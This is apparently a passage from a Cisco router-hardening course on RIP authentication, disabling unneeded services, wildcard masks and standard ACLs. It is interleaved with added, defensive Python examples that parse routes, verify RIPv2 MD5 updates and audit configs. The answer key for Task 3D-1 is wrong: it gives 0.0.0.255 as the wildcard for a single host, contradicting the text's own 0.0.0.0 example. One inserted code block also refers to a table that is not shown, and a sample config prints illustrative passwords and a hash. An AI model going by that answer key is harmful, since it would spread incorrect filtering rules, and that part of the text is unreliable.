R 172.17.0.0/16 [120/1] via 192.168.10.2, 00:00:20, Serial0
C 172.18.0.0/16 is directly connected, Ethernet0
In these fragments, you can identify the routes on each router. You can also identify
the routes that are directly connected and the routes that are using RIP. The
way that you identify this is by the letter in front of each route. For example, in
these examples, all routes with a letter C are connected interfaces. Routes with an
R are using RIP. If a route had been input statically, it would have an S in front
of it.
For the RIP routes shown, note that the number 120 is displayed in brackets after
the route. The 120 is an indicator of the administrative distance of this route.
(The number following the slash is the hop count.)
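The [administrative distance/metric] fields and the preference rule described above, as an added Python example that is not part of the course. It parses the LEFT router's `show ip route` lines quoted earlier, adds one constructed static route to the same destination as a competing candidate, and selects the route the way the text describes: lowest administrative distance first, then lowest metric. The `ad_anomalies` check is an added defender's check, not something the text describes: it flags a route whose printed distance differs from the default for its source, which happens only when someone has changed the distance in the configuration.

```python
import re
from typing import Dict, List

# Default administrative distances from the table above (lower = more trusted).
DEFAULT_AD = {"C": 0, "S": 1, "I": 100, "O": 110, "R": 120}

DYNAMIC_RE = re.compile(
    r"^(?P<code>[A-Z])\s+(?P<prefix>\S+)\s+\[(?P<ad>\d+)/(?P<metric>\d+)\]\s+via\s+(?P<via>[\d.]+)"
    r"(?:,\s+(?P<age>\d\d:\d\d:\d\d))?(?:,\s+(?P<iface>\S+))?$")
CONNECTED_RE = re.compile(
    r"^(?P<code>[A-Z])\s+(?P<prefix>\S+)\s+is directly connected,\s+(?P<iface>\S+)$")


def parse_route(line: str) -> Dict[str, object]:
    """Parse one line of 'show ip route' into its fields."""
    line = line.strip()
    m = DYNAMIC_RE.match(line)
    if m:
        return {"code": m["code"], "prefix": m["prefix"], "ad": int(m["ad"]),
                "metric": int(m["metric"]), "via": m["via"], "iface": m["iface"]}
    m = CONNECTED_RE.match(line)
    if m:  # connected routes print no [AD/metric]; both are 0
        return {"code": m["code"], "prefix": m["prefix"], "ad": 0, "metric": 0,
                "via": None, "iface": m["iface"]}
    raise ValueError(f"unrecognised route line: {line!r}")


def parse_table(text: str) -> List[Dict[str, object]]:
    return [parse_route(l) for l in text.strip().splitlines() if l.strip()]


def best_route(candidates: List[Dict[str, object]]) -> Dict[str, object]:
    """Router preference between sources: lowest administrative distance, then lowest metric."""
    return min(candidates, key=lambda r: (r["ad"], r["metric"]))


def ad_anomalies(routes: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Routes whose distance is not the default for their source letter; a changed
    distance alters which source wins and is worth reviewing."""
    return [r for r in routes if r["code"] in DEFAULT_AD and r["ad"] != DEFAULT_AD[r["code"]]]


# The LEFT router's table as shown in the text.
LEFT_SHOW_IP_ROUTE = """
R 192.168.10.0/24 [120/1] via 192.168.20.2, 00:00:13, Serial1
C 192.168.20.0/24 is directly connected, Serial1
C 172.16.0.0/16 is directly connected, Ethernet0
R 172.17.0.0/16 [120/1] via 192.168.20.2, 00:00:13, Serial1
R 172.18.0.0/16 [120/2] via 192.168.20.2, 00:00:13, Serial1
"""
# Constructed (hypothetical) static route to the same destination as the last RIP route.
CONSTRUCTED_STATIC = "S 172.18.0.0/16 [1/0] via 192.168.20.2"

if __name__ == "__main__":
    routes = parse_table(LEFT_SHOW_IP_ROUTE)
    rip = routes[-1]
    static = parse_route(CONSTRUCTED_STATIC)
    print("installed:", best_route([rip, static]))
    print("anomalies:", ad_anomalies(routes))
```

A real routing table shows only the winning route for a prefix, so the static and RIP entries would never both appear in `show ip route`; the candidate list models what the router holds internally from each source before it picks one.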
RIP
RIP, or the Routing Information Protocol, is one of the most straightforward routing
protocols that can be implemented. It also has no significant security, is
broadcast-based, and is noisy.
RIP functions by informing neighboring routers of the routers that the current
router can reach. The current routes are created during the simple configuration
process of setting up RIP in the router.
The following configuration fragments show the configuration of RIP on three
routers, LEFT, RIGHT, and CENTER:
LEFT#configure terminal
LEFT(config)#router rip
LEFT(config-router)#network 172.16.0.0
LEFT(config-router)#network 192.168.10.0
LEFT(config-router)#^Z
LEFT#
RIGHT#configure terminal
RIGHT(config)#router rip
RIGHT(config-router)#network 172.18.0.0
RIGHT(config-router)#network 192.168.20.0
RIGHT(config-router)#^Z
RIGHT#
CENTER#configure terminal
CENTER(config)#router rip
CENTER(config-router)#network 172.17.0.0
CENTER(config-router)#network 192.168.10.0
CENTER(config-router)#network 192.168.20.0
CENTER(config-router)#^Z
CENTER#
In these fragments, RIP routing has been configured with the networks that each
router can reach. For example, the LEFT router will announce that if there is a
packet destined for network 172.16.0.0, then the other routers should send it to
the LEFT router.
Because RIP is broadcast-based, any host on a segment where RIP broadcasts are
sent can receive the update. Only the router has a legitimate routing function, but
an attacker can learn valuable information, such as the configuration and addressing
of a network.
TASK 3B-2
Viewing a RIP Capture
Setup: You are logged on to Windows Server 2003 as the renamed
Administrator account, and Network Monitor is running.
1. Open rip update.cap located in C:\Tools\Lesson3.
2. Expand Frame One, and observe the contents of the packet.
3. Look for the destination address of the packet. Find the IP and MAC
destination addresses.
4. Observe the source address. You can conclude that this is likely the source
address of a router in the network.
5. Expand the RIP portion of the frame capture.
6. Examine the network details sent in the packet. Even though you are a
random user on the network, you have captured the packet and are able to
learn quite a few things about the network in a very short amount of time.
7. Close the capture file, and leave Network Monitor open.
RIPv2
In order to address some of the issues associated with RIP, RIPv2 was introduced
as a routing protocol. A security advantage was the ability to require and use
authentication for RIP updates. From a networking perspective, the configuration
is very similar to RIPv1, as shown previously. The following configuration fragment
shows the same three routers configured to use RIPv2 instead of RIPv1:
LEFT#configure terminal
LEFT(config)#router rip
LEFT(config-router)#version 2
LEFT(config-router)#network 172.16.0.0
LEFT(config-router)#network 192.168.10.0
LEFT(config-router)#^Z
LEFT#
RIGHT#configure terminal
RIGHT(config)#router rip
RIGHT(config-router)#version 2
RIGHT(config-router)#network 172.18.0.0
RIGHT(config-router)#network 192.168.20.0
RIGHT(config-router)#^Z
RIGHT#
CENTER#configure terminal
CENTER(config)#router rip
CENTER(config-router)#version 2
CENTER(config-router)#network 172.17.0.0
CENTER(config-router)#network 192.168.10.0
CENTER(config-router)#network 192.168.20.0
CENTER(config-router)#^Z
CENTER#
The authentication used is a key and MD5. The following configuration fragment
shows the setup of RIPv2 authentication. In this fragment, first the router is told
that RIP authentication is required, then the key (the word strongpassword) is
created.
Router#configure terminal
Router(config)#interface ethernet0
Router(config-if)#ip rip authentication key-chain 3
Router(config-if)#ip rip authentication mode md5
Router(config-if)#exit
Router(config)# interface serial0
Router(config-if)#ip rip authentication key-chain 3
Router(config-if)#ip rip authentication mode md5
Router(config-if)#exit
Router(config)# interface serial1
Router(config-if)#ip rip authentication key-chain 3
Router(config-if)#ip rip authentication mode md5
Router(config-if)#^Z
Router#configure terminal
Router(config)#key chain 3
Router(config-keychain)#key 1
Router(config-keychain-key)#key-string strongpassword
Router(config-keychain-key)#^Z
Router#
All routers that will exchange routing updates on the same network must use the
same configuration, so the authentication will match. Once the router is configured,
if you were to enter the show running-config command, you would
get the following new pieces in the output:
enable secret 5 $1$v13S$Nk8zY5NcYor5VvAfcfZCn0
enable password 2501
!
!
key chain 3
key 1
key-string strongpassword
!
interface Ethernet0
ip address 172.16.0.1 255.255.0.0
ip rip authentication mode md5
ip rip authentication key-chain 3
no mop enabled
interface Serial0
no ip address
shutdown
TASK 3B-3
Viewing a RIPv2 Capture
Setup: You are logged on to Windows Server 2003 as the renamed
Administrator account, and Network Monitor is running.
1. Open ripv2withAuthentication.cap, located in C:\Tools\Lesson3.
2. Expand Frame One (the only frame) and observe the contents of the
packet.
3. Look for the destination address of the packet. Find the IP and MAC
destination addresses.
4. Observe the source address. You can conclude that this is likely the source
address of a router in the network.
5. Expand the RIP portion of the frame capture.
6. Examine the network details sent in the packet.
7. Observe the addition of the Authentication portion of the capture and the
additional fields not present in the RIPv1 packet. Also observe that the
Routing Data is still visible.
8. Close Network Monitor.
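What step 7 shows in the capture, as an added Python example that is not part of the course or of any Cisco code: a RIPv2 Response is built with a keyed-MD5 authentication header and trailer, a receiver that holds the shared key can verify it and rejects a tampered copy, yet the route entries are readable by anyone without the key. The packet layout follows the structure of RFC 2082 (authentication entry with AFI 0xFFFF and type 3, trailer carrying the digest, key padded to 16 bytes and placed where the digest goes when hashing); it is an assumed model for illustration, not a byte-exact reproduction of a Cisco update, and the route list and key are constructed from the fragments above.

```python
import hashlib
import hmac
import ipaddress
import struct
from typing import List, Tuple


def rip_entry(prefix: str, metric: int, route_tag: int = 0, next_hop: str = "0.0.0.0") -> bytes:
    """One 20-byte RIPv2 route entry: AFI=2 (IP), tag, network, mask, next hop, metric."""
    net = ipaddress.ip_network(prefix)
    return struct.pack("!HH4s4s4sI", 2, route_tag, net.network_address.packed,
                       net.netmask.packed, ipaddress.ip_address(next_hop).packed, metric)


def padded_key(key: str) -> bytes:
    return key.encode().ljust(16, b"\x00")[:16]   # keyed MD5 uses a 16-byte key


def build_ripv2_md5(routes: List[Tuple[str, int]], key_id: int, key: str, seq: int) -> bytes:
    """RIPv2 Response with an MD5 authentication header and trailer (modelled on RFC 2082)."""
    header = struct.pack("!BBH", 2, 2, 0)              # command=2 (Response), version=2, unused
    body = b"".join(rip_entry(p, m) for p, m in routes)
    packet_len = 4 + 20 + len(body)                    # everything before the trailer
    auth_header = struct.pack("!HHHBBI8x", 0xFFFF, 3, packet_len, key_id, 16, seq)
    msg = header + auth_header + body
    trailer_head = struct.pack("!HH", 0xFFFF, 1)
    digest = hashlib.md5(msg + trailer_head + padded_key(key)).digest()
    return msg + trailer_head + digest


def verify_ripv2_md5(packet: bytes, key: str) -> bool:
    """Receiver side: recompute the digest with the shared key; reject on mismatch."""
    msg, trailer = packet[:-20], packet[-20:]
    if trailer[:4] != b"\xff\xff\x00\x01":
        return False
    expected = hashlib.md5(msg + trailer[:4] + padded_key(key)).digest()
    return hmac.compare_digest(expected, trailer[4:])


def read_routes(packet: bytes) -> List[Tuple[str, int]]:
    """Route entries are plaintext: a capture reveals them with no key at all."""
    routes = []
    pos = 4
    while pos + 20 <= len(packet):
        afi = struct.unpack("!H", packet[pos:pos + 2])[0]
        if afi == 2:
            _, _, ip, mask, _, metric = struct.unpack("!HH4s4s4sI", packet[pos:pos + 20])
            prefix_len = bin(int.from_bytes(mask, "big")).count("1")
            routes.append((f"{ipaddress.ip_address(ip)}/{prefix_len}", metric))
        pos += 20
    return routes


# Constructed sample: the LEFT router's two networks, signed with the key from the text.
SAMPLE = build_ripv2_md5([("172.16.0.0/16", 1), ("192.168.10.0/24", 2)],
                         key_id=1, key="strongpassword", seq=7)

if __name__ == "__main__":
    print("routes visible without the key:", read_routes(SAMPLE))
    print("authentic:", verify_ripv2_md5(SAMPLE, "strongpassword"))
    tampered = bytearray(SAMPLE)
    tampered[43] ^= 0x08                    # flip one bit of the first entry's metric
    print("tampered accepted:", verify_ripv2_md5(bytes(tampered), "strongpassword"))
```

The authentication gives integrity and origin, not confidentiality: an altered metric fails verification, but the network list is as exposed as it was in the RIPv1 capture, which is why the key does nothing to stop a listener from mapping the addressing.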
Topic 3C
Removing Protocols and Services
The fundamental concept of hardening the router is no different than hardening
Linux or Windows. You must remove all of the protocols and services that are
unused. You must configure the required protocols and services so that they are
secured for access. In this topic, you will look at removing many of the protocols
and services that are often not used on a router and continue to harden the
device.
CDP
The Cisco Discovery Protocol (CDP) is a protocol used by Cisco routers to
exchange information, such as platform information and status, with each other.
In general, CDP can be a useful thing to use when troubleshooting in a simple
environment. Unfortunately, like most things that can make our lives as administrators
a little easier, CDP can make an attacker's job a little easier because it
gives out important information such as the IOS version that the router is
running. And, of course, knowing what IOS version is running makes an attacker's
job much easier since he or she will have a much better idea of what exploits
will work against such a target.
In the following configuration fragment, you can see that turning off CDP for the
entire router is not a complex set of commands; only two commands are
required:
Router#config terminal
Router(config)#no cdp run
Router(config)#^Z
Router#
However, it may be desirable to stop CDP only on those interfaces that are not
connected directly to another router. Perhaps there is only a direct link between
two serial interfaces, and you want to allow CDP to run there, but not on the
internal Ethernet network. In the following configuration fragment, CDP is disabled
just for the Ethernet interface. Note that the only addition is the defining of
the interface, and the command is no cdp enable, instead of no cdp run:
Router#config terminal
Router(config)#interface Ethernet 0
Router(config-if)#no cdp enable
Router(config-if)#^Z
Router#
TASK 3C-1
Turning Off CDP
1. Create the configuration fragment that you would use for turning off
CDP on Ethernet 0, Ethernet 1, and Serial 1.
Router#config terminal
Router(config)#interface Ethernet 0
Router(config-if)#no cdp enable
Router(config-if)#interface Ethernet 1
Router(config-if)#no cdp enable
Router(config-if)#interface Serial 1
Router(config-if)#no cdp enable
Router(config-if)#^Z
Router#
ICMP
ICMP provides, among other functions, the ability to use the often-required ping
and traceroute commands. However, ICMP has become one of the most misused
of all protocols. DoS and DDoS attacks use ICMP, and more and more attacks
take advantage of this function of the network. In this section, only a few
examples of hardening ICMP are discussed.
ICMP Directed Broadcast
Smurf is an attack that takes advantage of ICMP. Specifically, what Smurf does is
to get many machines to flood a single host with ICMP packets, effectively shutting
down that host. The way this attack works is to ping an entire network, using
a spoofed IP address. When every host of the network responds to the IP address,
that machine has been attacked. This can easily lead to hundreds of machines
responding to a host simultaneously.
The following configuration fragment shows the disabling of ICMP directed
broadcasts on the Serial 1, Serial 0, and Ethernet 0 interfaces. To protect fully
against this attack, you should turn off broadcasts like this on all interfaces.
Router#config terminal
Router(config)#interface Ethernet 0
Router(config-if)#no ip directed-broadcast
Router(config-if)#interface Serial 0
Router(config-if)#no ip directed-broadcast
Router(config-if)#interface Serial 1
Router(config-if)#no ip directed-broadcast
Router(config-if)#^Z
Router#
ICMP Unreachable
Another very common attack is for a potential intruder to scan your system(s)
looking for services that are open and that can be exploited. It is common to use
ICMP to perform these scans of systems. If you remove the ICMP Unreachable
message, be aware that your system will not respond to desired unreachable messages,
such as when your internal users legitimately need them, such as during
time-outs. The following configuration fragment shows the disabling of ICMP
Unreachable messages on the Serial 0 interface. To remove ICMP Unreachable
messages on the entire router, this command needs to be entered for each
interface.
traceroute: An operation of sending trace packets for determining information; traces the route of UDP packets from the local host to a remote host. Normally traceroute displays the time and location of the route taken to reach its destination.
Router#config terminal
Router(config)#interface Serial 0
Router(config-if)#no ip unreachables
Router(config-if)#^Z
Router#
TASK 3C-2
Hardening ICMP
1. Create the configuration fragment that you would use to disable ICMP
Directed Broadcasts and ICMP Unreachable messages on the entire
router, which has the Ethernet 0, Serial 0, and Serial 1 interfaces.
Router#config terminal
Router(config)#interface Ethernet 0
Router(config-if)#no ip directed-broadcast
Router(config-if)#no ip unreachables
Router(config-if)#interface Serial 0
Router(config-if)#no ip directed-broadcast
Router(config-if)#no ip unreachables
Router(config-if)#interface Serial 1
Router(config-if)#no ip directed-broadcast
Router(config-if)#no ip unreachables
Router(config-if)#^Z
Router#
Source Routing
A feature that was added to routers to increase the control administrators had over
the network was source routing. This feature has become a vulnerability that
attackers now use. Source routing is used to allow a packet to dictate the path it
should take through a routed network. This packet does not follow the routing
tables as designated by the routing protocols. Doing so may allow an attacker to
bypass critical systems, such as a firewall or an IDS. In most situations, there is
no need for source routing to be allowed on any router. The configuration fragment
that follows shows the disabling of the source routing service:
Router#config terminal
Router(config)#no ip source-route
Router(config)#^Z
Router#
Small Services
TCP and UDP small services are enabled on some routers by default (generally
IOS 11.3 and previous versions). Small services are not often used anymore and
include echo, discard, daytime, and chargen. On most routers, be sure to disable
these services. The configuration fragment that follows shows the disabling of
small services for both TCP and UDP:
Router#config terminal
Router(config)#no service tcp-small-servers
Router(config)#no service udp-small-servers
Router(config)#^Z
Router#
Finger
Finger is another older service that is rarely used in modern networks. The Finger
service is used to find information about users who are logged into a router. On
older versions of the IOS (11.2 and older), Finger is disabled by using the
no service finger command. On newer versions of the IOS (11.3 and
newer), Finger is disabled by using the no ip finger command. In the following
code, the first configuration fragment shows the removal of the Finger
service from an older router, and the second fragment shows the removal of the
Finger service from a newer router:
Router#config terminal
Router(config)#no service finger
Router(config)#^Z
Router#
Router#config terminal
Router(config)#no ip finger
Router(config)#^Z
Router#
Small services are also known as small servers.
Remaining Services
As a security professional, you know that hardening a piece of equipment means
disabling or removing all of the services and protocols that you are not using. In
this section, you will see several other services that you should consider disabling
for your router. In consideration of space, every service and protocol cannot be
listed in this section; only several of the significant services can be highlighted.
The BootP service is used to remotely boot computers via the network. This
service can be disabled by using the no ip bootp server command.
The DNS function is enabled on Cisco routers, but there is no defined name
server. The net result is broadcasting for all DNS requests. To disable this
function, use the no ip name-server command.
The Network Time Protocol (NTP) is used for time synchronization on the
network. This service can be disabled by using no ntp server. If you
want to disable this protocol for only a single interface, use ntp disable,
when you are in the Interface Mode.
The Simple Network Management Protocol (SNMP) is used to communicate
between network devices. SNMP left as-is on routers can provide information
about the router to attackers. Disable SNMP by using
no snmp-server.
HTTP is used on some routers to allow for remote access and management.
Unless specifically required in your organization, this should be disabled. To
disable HTTP, use no ip http server.
The configuration fragment that will disable all of the above services will look
like this:
Router#config terminal
Router(config)#no ip bootp server
Router(config)#no ip name-server
Router(config)#no ntp server
Router(config)#no snmp-server
Router(config)#no ip http server
Router(config)#^Z
Router#
When NTP is used in conjunction with syslog services, keeping accurate timestamps on log entries, it can be useful for forensic purposes.
TASK 3C-3
Removing Unneeded Services
1. Create the configuration fragment that you would use to remove the following
services from the whole IOS v12.x router: CDP, ICMP Directed
Broadcasts, Small Servers, Source Routing, and Finger. For this exercise,
you can assume that the interfaces are named E0, S0, and S1.
Router#config terminal
Router(config)#no cdp run
Router(config)#interface Ethernet 0
Router(config-if)#no ip directed-broadcast
Router(config-if)#interface Serial 0
Router(config-if)#no ip directed-broadcast
Router(config-if)#interface Serial 1
Router(config-if)#no ip directed-broadcast
Router(config-if)#^Z
Router#
Router#config terminal
Router(config)#no service tcp-small-servers
Router(config)#no service udp-small-servers
Router(config)#no ip source-route
Router(config)#no ip finger
Router(config)#^Z
Router#
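Once the fragments from Topic 3C have been entered, a defender wants a repeatable way to confirm they are actually present in the saved configuration. The following is an added Python example, not course material or a Cisco tool: it splits a running-config into global lines and per-interface blocks and reports every hardening command from this topic (CDP, source routing, small servers, finger, directed broadcasts and ICMP unreachables) that is missing. The sample running-config is constructed, the required-command lists are assumptions taken from the fragments above (the IOS 11.3-and-newer `no ip finger` form is used), and interfaces that are shut down are skipped since they pass no traffic.

```python
from typing import Dict, List, Tuple

# Global commands the text uses to turn services off (IOS 11.3+ naming for finger).
GLOBAL_REQUIRED = {
    "no cdp run": "CDP",
    "no ip source-route": "source routing",
    "no service tcp-small-servers": "TCP small servers",
    "no service udp-small-servers": "UDP small servers",
    "no ip finger": "finger",
}
# Per-interface commands from the ICMP section.
INTERFACE_REQUIRED = {
    "no ip directed-broadcast": "directed broadcasts",
    "no ip unreachables": "ICMP unreachables",
}


def parse_config(text: str) -> Tuple[List[str], Dict[str, List[str]]]:
    """Split a running-config into global lines and per-interface sub-command lists.
    An interface block ends at the next '!' separator or the next 'interface' line."""
    global_lines: List[str] = []
    interfaces: Dict[str, List[str]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "!":
            current = None
            continue
        if line.startswith("interface "):
            current = line.split(None, 1)[1]
            interfaces[current] = []
            continue
        if current is None:
            global_lines.append(line)
        else:
            interfaces[current].append(line)
    return global_lines, interfaces


def audit(text: str) -> List[str]:
    """Report each hardening line that is absent. Absence means 'not confirmed', not proof
    the service is on: IOS versions whose default for a setting is off omit it from the
    running-config, so verify on the device when a finding is unexpected."""
    global_lines, interfaces = parse_config(text)
    findings = []
    for cmd, name in GLOBAL_REQUIRED.items():
        if cmd not in global_lines:
            findings.append(f"global: {name} not confirmed disabled ({cmd!r} missing)")
    for iface, lines in interfaces.items():
        if "shutdown" in lines:          # administratively down: passes no traffic
            continue
        for cmd, name in INTERFACE_REQUIRED.items():
            if cmd not in lines:
                findings.append(f"{iface}: {name} not confirmed disabled ({cmd!r} missing)")
    return findings


# Constructed running-config (hypothetical router) with one global and one interface gap.
SAMPLE_CONFIG = """\
version 12.2
hostname Router
!
no service tcp-small-servers
no service udp-small-servers
no ip source-route
no ip finger
!
interface Ethernet0
 ip address 172.16.0.1 255.255.0.0
 no ip directed-broadcast
 no ip unreachables
!
interface Serial0
 ip address 192.168.20.1 255.255.255.0
 no ip unreachables
!
interface Serial1
 no ip address
 shutdown
!
"""

if __name__ == "__main__":
    for finding in audit(SAMPLE_CONFIG):
        print(finding)
```

Run against the sample, the audit reports that CDP is still running globally and that Serial0 lacks `no ip directed-broadcast`; the same parser can be pointed at a saved copy of `show running-config` to check every router the same way.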
AutoSecure
A newer security feature, built into the IOS starting with version 12.3(1) is called
AutoSecure. AutoSecure is essentially a script designed to help you secure the
router by following a set of questions versus coding line-by-line the services and
interfaces you want to secure.
AutoSecure can also address your passwords, ensuring that no simple words are
used, prompt for the configuration of SSH, and can enable console logging,
among other security issues. AutoSecure has its security features divided into two
core groups (Cisco calls these groups: Planes). These two groups are called the
Management Plane and the Forwarding Plane.
The Management Plane
The Management Plane of the AutoSecure feature is where the majority of your
services are addressed. Both the global services, and the services that are unique
to each interface are dealt with in this Plane. The following list details the services
that are specific to each interface that can be disabled with AutoSecure:
ICMP (including redirects, unreachables, and mask replies)
Directed broadcasts
Maintenance Operations Protocol (MOP) services
Proxy-Arp
You know by now that there are many more security issues other than the ones
addressed in the previous list. The following list details the services, global to
the whole router, that can be disabled with AutoSecure:
BootP
CDP
Finger
HTTP Server
IdentD protocol
Network Time Protocol (NTP)
Packet Assembler and Disassembler (PAD)
Source Routing
Small Servers (both TCP and UDP)
The Forwarding Plane
In the context of this course, the only feature of The Forwarding Plane that will
be discussed is the Context-based Access Control (CBAC). If you are using this
feature, AutoSecure will prompt you through the configurations. CBAC will be
addressed later in this lesson.
Topic 3D
Creating Access Control Lists
Access Control Lists (ACLs) enable network administrators to not only control
access from a security standpoint, but also can be used to restrict bandwidth use
on critical links. In this and the following topic, the discussion will be on IP
access lists, but be aware that access lists can exist for other routed protocols,
such as AppleTalk and IPX/SPX.
An ACL is a packet filter that compares a packet with a given set of criteria. The
ACL checks the packet and acts upon the packet as defined by the list. Access
Control Lists are divided into several main categories, and for this course, you
will focus on three categories: Standard ACLs, Extended ACLs, and Context-based
ACLs.
Standard ACLs are designed to look at the source address of a packet that
has been received by the router. The result of the list is to either permit or
deny the packet based on the subnet, host, or network address. A standard
access list takes effect for the full IP protocol stack.
Extended ACLs are designed to look at both the source and destination
packet addresses. Not limited to source IP address, extended lists allow for
checking of protocol, port number, and destination address. This additional
flexibility is the reason that many administrators implement extended lists on
their networks.
Context-based ACLs are designed to look at information from layer 3 all the
way through layer 7. This becomes the Cisco IOS stateful firewall function
inside the Cisco Router.
packet filter: Inspects each packet for user defined content, such as an IP address, but does not track the state of sessions. This is one of the least secure types of firewall.
Access Control List Operation
The function of an access list is the same internally in the router, regardless of
the type of list (standard, extended, and so on). An ACL can be designed to function
for both inbound and outbound packets. When an ACL is checking inbound
packets, the list is checked to see if the packet is allowed prior to the router
checking to see if the packet has a destination in the routing table.
When an ACL is checking outbound packets, the packet will first run through the
router's table, looking for a match. If there is a route for the packet, then the
ACL is applied to the outbound packet.
Figure 3-13: The Access Control List process.
Figure 3-13 illustrates this outbound process. A packet is taken in via Interface
E0. In this example, the packet is incoming on Interface Ethernet 0 and destined
to be outgoing on Interface Ethernet 1. Because the list is used to determine
whether or not the packet is to exit on interface Ethernet 1, this list can be determined
to be an outgoing list.
The Access List Process
A critical component of access lists is to understand that they operate in sequence,
from the top down. In other words, the first statement of an access list is
checked. If the packet does not match the rules of that statement, then the packet
is sent to the next statement, and on and on, until there is a match.
Once there is a match, the packet will follow that rule. In the event that there are
two rules that can apply to the same packet, whichever rule the packet hits first is
the one that it will follow.
There will always be a match, since the end of every access list is an implicit
deny, meaning that every list must have at least one permit statement or all packets
will be denied! Figure 3-14 shows a graphical example of an access list
statement process.
Figure 3-14: The list process of an ACL.
The Wildcard Mask
IP access lists use a value known as the wildcard mask to determine whether or
not a packet matches a given statement in the list. The wildcard mask uses 1s and
0s to identify the defined IP address(es) for permission or denial.
Wildcard masks are 32-bit values that look like traditional subnet masks, but they
do not function in the same manner. A wildcard mask uses the 1s and 0s to match
defined bits of an IP address. The rules of the bits of a wildcard mask are as follows:
If the wildcard mask bit is a 1, then do not check the corresponding bit of
the IP address for a match.
If the wildcard mask bit is a 0, then do check the corresponding bit of the IP
address for a match.
The chart in Figure 3-15 shows several examples of the wildcard mask checking
options. Where there is a 0, the values are checked for a match, and where there
is a 1, the value is not checked.
Figure 3-15: Examples of wildcard masks.
As you can see from this chart, if there were a mask of 11111111, then none of
the eight bits of the corresponding IP address would be checked. Likewise, if
there were a wildcard mask of 00000000, then all eight bits of the corresponding
IP address would be checked.
Wildcard Mask Examples
If an administrator wanted to have an access list statement match a single host in
a network, the following wildcard mask could be used.
Item Value
IP Address 10.15.10.187
Subnet Mask 255.255.255.0
Wildcard Mask 0.0.0.0
This tells the router to check every bit of the IP address, and if those bits are
10.15.10.187, then this access list statement applies to this host.
If the goal is to have an access list statement match an entire network, the following
wildcard mask could be used.
Item Value
IP Network 10.15.10.0
Subnet Mask 255.255.255.0
Wildcard Mask 0.0.0.255
This tells the router to check only the first 24 bits of the IP address, and if the
decimal value of those bits is 10.15.10, then this access list statement applies to
this network.
If the goal is to block a specified subnet, the mask requires a bit more calculation,
but still functions the same way. In the event that the administrator wants to
have subnet 10.15.10.32 match an access list statement, the mask would be as
follows.
Item Value
IP Subnet Address 10.15.10.32
Subnet Mask 255.255.255.224
Wildcard Mask 0.0.0.31
This tells the router to check all but the last five bits of the fourth octet. If the
checked bits equal 10.15.10.32, then the access list statement applies to this subnet.
TASK 3D-1
Creating Wildcard Masks
1. If your goal is to block out a single host, such as 192.168.27.93, that uses
255.255.255.0 as the subnet mask, what wildcard mask would you use?
0.0.0.255
2. If your goal is to block out a subnet of 10.12.24.0 that uses 255.255.248.0
as the subnet mask, what wildcard mask would you use?
0.0.7.255
3. If your goal is to block out network 172.168.32.0 that uses 255.255.255.0
as the subnet mask, what wildcard mask would you use?
0.0.0.255
Topic 3E
Implementing Access Control Lists
In this topic, we will detail the implementation of and rule-creation for access
lists. There will be examples of access lists and their syntax on a Cisco router.
Examples will include both standard and extended IP access lists, the most common
lists for networks connected to the Internet today.
Access Control Lists are implemented in two stages on Cisco routers. The first
stage is to create the list, including all of its statements. The second stage is the
implementation of the list on an interface of a router, defining whether the list is
to filter packets as an inbound or outgoing list.
Standard Access Control List Command Syntax
To create a standard ACL, the following line shows the proper syntax. Items in
italics are variables to be filled in.
Router(config)#access-list access-list-number {permit|deny} source [source-mask]
Although you have the option of using standard or extended access lists, the extended lists are preferred because they provide more granularity when you are permitting and denying traffic.
Where:
access-list is the actual command to create a list.
access-list-number is a value between 1 and 99, that is selected to create a
standard ACL.
permit|deny is the value that defines whether the list will grant or block
access.
source is the value that is the actual source address to match.
source-mask is the value that specifies the wildcard mask for the defined
host.
Once the list has been created, the second stage is to apply the list to an interface. Before you do this, however, make sure that you have specified the interface that you want to be affected by the list. The syntax for list application is shown here. Again, items in italics are variables to be filled in.
Router(config-if)#ip access-group access-list-number {in|out}
Where:
ip access-group is the command to link (implement) a list to an interface.
access-list-number is the value assigned to the actual list to be implemented on this interface.
in|out is the value that defines whether the list will filter inbound or outbound packets.
Extended Access Control List Syntax
To create an extended ACL, the following line shows the proper syntax. Remember, items in italics are variables to be filled in.
Router(config)#access-list access-list-number {permit|deny} protocol source source-mask destination destination-mask [operator|operand]
Where:
access-list is the actual command to create a list.
access-list-number is a value between 100 and 199; a number in that range creates an extended ACL.
permit|deny is the value that defines whether the list will grant or block access.
protocol is the value that defines what protocol to filter.
source is the value that defines the source IP address.
source-mask is the value that defines the wildcard mask for the source.
destination is the value that defines the destination IP address.
destination-mask is the value that defines the wildcard mask for the destination.
operator|operand is the value that defines the options for the list. Options include:
GT: Greater than
LT: Less than
EQ: Equal to
NEQ: Not Equal to
Once the list has been created, the second stage is to apply the list to an interface. The syntax for list application is shown. As before, items in italics are variables to be filled in.
Router(config-if)#ip access-group access-list-number {in|out}
Where:
ip access-group is the command to link (implement) a list to an interface.
access-list-number is the value assigned to the actual list to be implemented on this interface.
in|out is the value that defines whether the list will filter inbound or outbound packets.
Figure 3-16: A sample network for ACL implementation.
Use Figure 3-16, with the network and host IP addresses defined, to look at several examples of access lists. The same figure will be used for all examples, only with different lists, different goals, and different implementations. These examples will be using both standard and extended IP access lists.
Denial of a Specific Host
Our first example will be the simple denial of a defined host into the router. This can be accomplished by using a standard ACL.
The configuration fragment for this example is:
Router#configure terminal
Router(config)#access-list 23 deny 192.168.10.7 0.0.0.0
Router(config)#access-list 23 permit 0.0.0.0 255.255.255.255
Router(config)#interface Ethernet 0
Router(config-if)#ip access-group 23 in
Router(config-if)#^Z
Router#
Denial of a Subnet
Our second example will be the denial of a defined host out to the Internet and the denial of an entire network to the Internet. This can also be accomplished by using a standard ACL. The configuration fragment for this example is:
Router#configure terminal
Router(config)#access-list 45 deny 192.168.10.7 0.0.0.0
Router(config)#access-list 45 deny 192.168.20.0 0.0.0.255
Router(config)#access-list 45 permit 0.0.0.0 255.255.255.255
Router(config)#interface Serial 0
Router(config-if)#ip access-group 45 out
Router(config-if)#^Z
Router#
Denial of a Network
Our third example will be the denial of an entire network from another network. This can be accomplished by using a standard ACL. The configuration fragment for this example is:
Router#configure terminal
Router(config)#access-list 57 deny 192.168.20.0 0.0.0.255
Router(config)#access-list 57 deny 192.168.10.0 0.0.0.255
Router(config)#access-list 57 permit 0.0.0.0 255.255.255.255
Router(config)#interface Ethernet 0
Router(config-if)#ip access-group 57 out
Router(config-if)#interface Ethernet 1
Router(config-if)#ip access-group 57 out
Router(config-if)#^Z
Router#
Granting Telnet from One Specific Host
